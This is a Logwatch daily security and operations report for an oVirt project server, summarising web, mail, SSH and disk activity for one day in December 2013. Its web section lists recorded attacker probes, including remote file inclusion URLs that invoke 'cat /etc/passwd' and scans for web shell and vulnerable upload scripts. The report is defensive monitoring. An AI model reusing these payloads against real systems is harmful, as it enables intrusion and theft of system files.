################### Logwatch 7.3.6 (05/19/07) #################### Processing Initiated: Sat Dec 28 03:14:46 2013 Date Range Processed: yesterday ( 2013-Dec-27 ) Period is day. Detail Level of Output: 0 Type of Output: unformatted Logfiles for Host: linode01.ovirt.org ################################################################## --------------------- httpd Begin ------------------------ A total of 1 sites probed the server 212.90.148.101 A total of 3 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit): /user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd HTTP Response 302 /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? HTTP Response 302 /gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd HTTP Response 302 Requests with error response codes 403 Forbidden /wordpress/wp-admin/: 2 Time(s) 404 Not Found //administrator/components/com_jinc/classe ... pload_image.php: 6 Time(s) //components/com_jinc/classes/graphics/php ... pload_image.php: 5 Time(s) //components/com_jnews/includes/openflashc ... pload_image.php: 1 Time(s) //images/stories/3xp.php: 2 Time(s) /_______: 1 Time(s) /__mailman/listinfo/users: 1 Time(s) /admin.php: 1 Time(s) /admin/: 1 Time(s) /admin/banner_manager.php/login.php: 1 Time(s) /admin/board: 4 Time(s) /admin/categories.php/login.php: 1 Time(s) /admin/categories.php/login.php?cPath=&act ... product_preview: 1 Time(s) /admin/file_manager.php/login.php: 1 Time(s) /admin/login.php: 1 Time(s) /admin/sqlpatch.php/password_forgotten.php?action=execute: 1 Time(s) /administrator/index.php: 1 Time(s) /bitrix/admin/index.php?lang=en: 1 Time(s) /blog/wp-admin/: 2 Time(s) /board: 8 Time(s) /category/news/feed: 1 Time(s) /category/news/feed/: 15 Time(s) /favicon.ico: 442 Time(s) /fckeditor/editor/filemanager/upload/test.html: 1 Time(s) /listinfo/board: 4 Time(s) /mailman/project-planning/2011-September/000283.html: 1 Time(s) /meetings/ovirt/2012/ovirt.2013-01-09-15.01.html: 2 Time(s) /meetings/ovirt/2012/ovirt.2013-01-09-15.01.log.html: 2 Time(s) /pipermail/infra/2012-December/001733.html ... voiy.ru//xp.php: 4 Time(s) /pipermail/infra/2012-December/wp-content/ ... voiy.ru//xp.php: 1 Time(s) /pipermail/infra/2012-October/001166.html& ... ?action=execute: 1 Time(s) /pipermail/infra/2012-October/001233.html& ... r.php/login.php: 2 Time(s) /pipermail/infra/2012-October/001233.html& ... s.php/login.php: 1 Time(s) /pipermail/infra/2012-October/admin/banner ... r.php/login.php: 1 Time(s) /pipermail/infra/2012-October/admin/catego ... product_preview: 1 Time(s) /pipermail/infra/2012-October/admin/categories.php/login.php: 1 Time(s) /pipermail/infra/2012-October/admin/file_m ... r.php/login.php: 1 Time(s) /pipermail/infra/2012-October/admin/sqlpat ... ?action=execute: 1 Time(s) /pipermail/infra/2013-December//administra ... pload_image.php: 5 Time(s) /pipermail/infra/2013-December//components ... pload_image.php: 6 Time(s) /pipermail/infra/2013-December/004585.html ... pload_image.php: 10 Time(s) /pipermail/infra/2013-February/001992.html ... cl%2Fspydee.php: 2 Time(s) /pipermail/infra/2013-February/002129.html ... voiy.ru//xp.php: 2 Time(s) /pipermail/infra/2013-February/wp-content/ ... cl%2Fspydee.php: 1 Time(s) /pipermail/infra/2013-February/wp-content/ ... voiy.ru//xp.php: 1 Time(s) /pipermail/infra/2013-March/tiki-register.php: 3 Time(s) /pipermail/infra/2013-May/002991.html& ... rd.php?id=byroe: 1 Time(s) /pipermail/infra/2013-May/003102.html& ... voiy.ru//xp.php: 2 Time(s) /pipermail/infra/2013-May/wp-content/theme ... voiy.ru//xp.php: 1 Time(s) /pipermail/infra/2013-May/zboard.php?id=byroe: 1 Time(s) /pipermail/infra/2013-October//administrat ... pload_image.php: 1 Time(s) /pipermail/infra/2013-October//components/ ... pload_image.php: 1 Time(s) /pipermail/infra/2013-October/004039.html& ... pload_image.php: 10 Time(s) /pipermail/node-patches/2013-march/004623.html: 1 Time(s) /pipermail/user/register: 2 Time(s) /pipermail/users/2012-April//images/stories/3xp.php: 2 Time(s) /pipermail/users/2012-April/007177.html+++ ... F0%E0%E2%EA%E8;: 3 Time(s) /releases//3.3/rpm/EL/6Server/repodata/695 ... -primary.xml.gz: 1 Time(s) /releases/3.2/rpm/EL/20/repodata/repomd.xml: 7 Time(s) /releases/3.3.2/rpm/Fedora/16/repodata/repomd.xml: 1 Time(s) /releases/3.3.2/rpm/Fedora/17/repodata/repomd.xml: 10 Time(s) /releases/3.3.2/rpm/Fedora/19/repodata/1ea ... ists.sqlite.bz2: 1 Time(s) /releases/3.3.2/rpm/Fedora/20/repodata/repomd.xml: 218 Time(s) /releases/alpha/rpm/Fedora/20/repodata/repomd.xml: 48 Time(s) /releases/beta/rpm/Fedora/$releasever/: 1 Time(s) /releases/beta/rpm/Fedora/18/repodata/repomd.xml: 4 Time(s) /releases/beta/rpm/Fedora/20/repodata/repomd.xml: 91 Time(s) /releases/nightly/RHEL/6/repodata/repomd.xml: 2 Time(s) /releases/nightly/fedora/16/: 1 Time(s) /releases/nightly/fedora/16/ovirt-engine.repo: 1 Time(s) /releases/nightly/fedora/16/repodata/repomd.xml: 240 Time(s) /releases/nightly/fedora/17: 1 Time(s) /releases/nightly/rpm/EL/6/SRPMS/ovirt-eng ... 912.el6.src.rpm: 1 Time(s) /releases/nightly/rpm/EL/6/SRPMS/ovirt-eng ... 953.el6.src.rpm: 1 Time(s) /releases/nightly/rpm/EL/6/SRPMS/vdsm-4.13 ... a97.el6.src.rpm: 1 Time(s) /releases/nightly/rpm/EL/6/hooks/vdsm-hook ... .el6.noarch.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/17/noarch/: 1 Time(s) /releases/nightly/rpm/Fedora/17/repodata/repomd.xml: 2 Time(s) /releases/nightly/rpm/Fedora/19/SRPMS/ovir ... 07.fc19.src.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/19/SRPMS/ovir ... 50.fc19.src.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/19/SRPMS/ovir ... f7.fc19.src.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/19/SRPMS/vdsm ... 1e.fc19.src.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/19/SRPMS/vdsm ... 4d.fc19.src.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/19/repodata/0 ... ther.sqlite.bz2: 6 Time(s) /releases/nightly/rpm/Fedora/19/repodata/8 ... -primary.xml.gz: 1 Time(s) /releases/nightly/rpm/el/6/repodata/repomd.xml: 13 Time(s) /releases/o: 1 Time(s) /releases/ovirt-fedora.noarch.rpm: 1 Time(s) /releases/ovirt-release-centos.noarch.rpm: 1 Time(s) /releases/ovirt-release-el6-8-1.noarch.rpm: 7 Time(s) /releases/ovirt-release-el6.noarch.rpm: 1 Time(s) /releases/ovirt-release-fedora-4-2.noarch.rpm: 1 Time(s) /releases/ovirt-release-fedora.noarch.rpm%e2%80%9d: 1 Time(s) /releases/ovirt-release-fedora.noarch.rpm/ ... data/repomd.xml: 2 Time(s) /releases/stable/binary/: 5 Time(s) /releases/stable/fedora/16/repodata/filelists.xml.gz: 24 Time(s) /releases/stable/fedora/16/repodata/repomd.xml: 250 Time(s) /releases/stable/ovirt-engine.repo: 1 Time(s) /releases/stable/rpm/EL/$releaserver: 1 Time(s) /releases/stable/rpm/EL/6.2/repodata/repomd.xml: 2 Time(s) /releases/stable/rpm/EL/6/images/pxeboot/: 1 Time(s) /releases/stable/rpm/EL/6/repodata/69581d4 ... -primary.xml.gz: 1 Time(s) /releases/stable/rpm/EL/6Workstation/repodata/repomd.xml: 2 Time(s) /releases/stable/rpm/EL6/6/repodata/repomd.xml: 2 Time(s) /releases/stable/rpm/EL6/6Workstation/repodata/repomd.xml: 2 Time(s) /releases/stable/rpm/Fedora//repodata/repomd.xml: 1 Time(s) /releases/stable/rpm/Fedora/15/repodata/repomd.xml: 14 Time(s) /releases/stable/rpm/Fedora/16/repodata/repomd.xml: 16 Time(s) /releases/stable/rpm/Fedora/19/repodata/51 ... ists.sqlite.bz2: 1 Time(s) /releases/stable/rpm/Fedora/20/repodata/re ... 5bErrno%2014%5d: 2 Time(s) /releases/stable/rpm/Fedora/20/repodata/repomd.xml: 420 Time(s) /releases/stable/rpm/Fedora/repodata/repomd.xml: 8 Time(s) /releases/updates-testing/rpm/Fedora/20/repodata/repomd.xml: 72 Time(s) /releases/user/register: 1 Time(s) /robots.txt: 81 Time(s) /user/: 1 Time(s) /user/register: 2 Time(s) /wp-admin/: 2 Time(s) /wp-content/themes/multidesign/scripts/ima ... voiy.ru//xp.php: 1 Time(s) /wp-content/themes/welcome_inn/thumb.php?s ... cl%2Fspydee.php: 1 Time(s) /wp-login.php: 6 Time(s) /wp-login.php?action=register: 8 Time(s) /wp/wp-admin/: 2 Time(s) /zboard.php?id=byroe: 1 Time(s) 416 Request Range Not Satisfiable /releases/stable/rpm/Fedora/18/noarch/ovir ... -7-1.noarch.rpm: 1 Time(s) /releases/stable/rpm/Fedora/18/noarch/ovir ... fc18.noarch.rpm: 4 Time(s) ---------------------- httpd End ------------------------- --------------------- Postfix Begin ------------------------ 14 *Warning: Pre-queue content-filter connection overload 11.955M Bytes accepted 12,535,300 74.876M Bytes delivered 78,513,420 ======== ================================================ 827 Accepted 99.40% 5 Rejected 0.60% -------- ------------------------------------------------ 832 Total 100.00% ======== ================================================ 2 Reject relay denied 40.00% 3 Reject unknown user 60.00% -------- ------------------------------------------------ 5 Total Rejects 100.00% ======== ================================================ 690 Connections made 690 Disconnections 817 Removed from queue 428 Delivered 8437 Sent via SMTP 7 Forwarded 40 Deferred 333 Deferrals 1 Bounce (local) 1 Bounce (remote) 2 Expired and returned to sender 4 DSNs undeliverable 245 Connection failure (outbound) 16 Timeout (inbound) 98 Hostname verification errors 55 Enabled PIX workaround **Unmatched Entries** 1 Dec 27 13:21:18 linode01 postfix/smtp[10751]: 5FB1AC263: host emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554 emailgw02.pnnl.gov 1 Dec 27 23:09:13 linode01 postfix/smtp[19545]: 33FC5C1E2: host emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554 emailgw02.pnnl.gov 1 Dec 27 06:10:12 linode01 postfix/smtp[4587]: 86B2FC181: host emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554 Emailgw01.pnnl.gov 1 Dec 27 07:47:38 linode01 postfix/smtp[5928]: D48ABC1DB: host emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554 Emailgw01.pnnl.gov 1 Dec 27 23:09:13 linode01 postfix/smtp[19604]: 33FC5C1E2: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 13:20:17 linode01 postfix/smtp[10731]: D98DDC1E0: host mailfilter2.netspot.com.au[2400:7d00:110:2::202] refused to talk to me: 554-int-mailfilter-prod-ame1a.ame1.netspot.com.au 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 07:47:38 linode01 postfix/smtp[5949]: D48ABC1DB: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 16:54:20 linode01 postfix/smtp[13708]: AB57BC1E0: host emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554 Emailgw01.pnnl.gov 1 Dec 27 13:21:28 linode01 postfix/smtp[10784]: 073B4C266: host emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554 emailgw02.pnnl.gov 1 Dec 27 13:21:18 linode01 postfix/smtp[10761]: 5FB1AC263: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 13:21:28 linode01 postfix/smtp[10724]: 073B4C266: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 23:09:13 linode01 postfix/smtp[19545]: 33FC5C1E2: host emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554 Emailgw01.pnnl.gov 1 Dec 27 06:10:12 linode01 postfix/smtp[4587]: 86B2FC181: host emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554 emailgw02.pnnl.gov 1 Dec 27 13:21:10 linode01 postfix/smtp[10751]: C7EACC213: host emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554 emailgw02.pnnl.gov 1 Dec 27 07:47:38 linode01 postfix/smtp[5928]: D48ABC1DB: host emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554 emailgw02.pnnl.gov 1 Dec 27 07:47:40 linode01 postfix/smtp[5963]: 1FA6AC215: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 13:21:09 linode01 postfix/smtp[10750]: C7EACC213: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 13:21:10 linode01 postfix/smtp[10751]: C7EACC213: host emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554 Emailgw01.pnnl.gov 1 Dec 27 13:21:28 linode01 postfix/smtp[10784]: 073B4C266: host emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554 Emailgw01.pnnl.gov 1 Dec 27 13:21:18 linode01 postfix/smtp[10751]: 5FB1AC263: host emailgw01.pnnl.gov[2620:0:50f0:2309:192:101:109:61] refused to talk to me: 554 Emailgw01.pnnl.gov 1 Dec 27 16:54:20 linode01 postfix/smtp[13708]: AB57BC1E0: host emailgw02.pnnl.gov[2620:0:50f0:2309:192:101:109:63] refused to talk to me: 554 emailgw02.pnnl.gov 1 Dec 27 06:10:11 linode01 postfix/smtp[4669]: 86B2FC181: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. 1 Dec 27 16:54:19 linode01 postfix/smtp[13723]: AB57BC1E0: host mailgateway.anl.gov[2620:0:dc0:1805::28] refused to talk to me: 554-mailgateway.anl.gov 554 Your access to this mail system has been rejected due to the sending MTA's poor reputation. If you believe that this failure is in error, please contact the intended recipient via alternate means. ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: jenkins (45687666) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Users logging in through sshd: gerrit-backup: 107.22.212.69 (gerrit.ovirt.org): 2 times jenkins: 66.187.237.11 (nat-pool-tlv-u1.redhat.com): 1 time Received disconnect: 11: Bye Bye : 390 Time(s) 11: Goodbye : 2 Time(s) 11: disconnected by user : 2 Time(s) SFTP subsystem requests: 1 Time(s) **Unmatched Entries** reverse mapping checking getaddrinfo for dsl-187-139-26-169-dyn.prod-infinitum.com.mx [187.139.26.169] failed - POSSIBLE BREAK-IN ATTEMPT! : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/xvda 59G 52G 7.8G 87% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################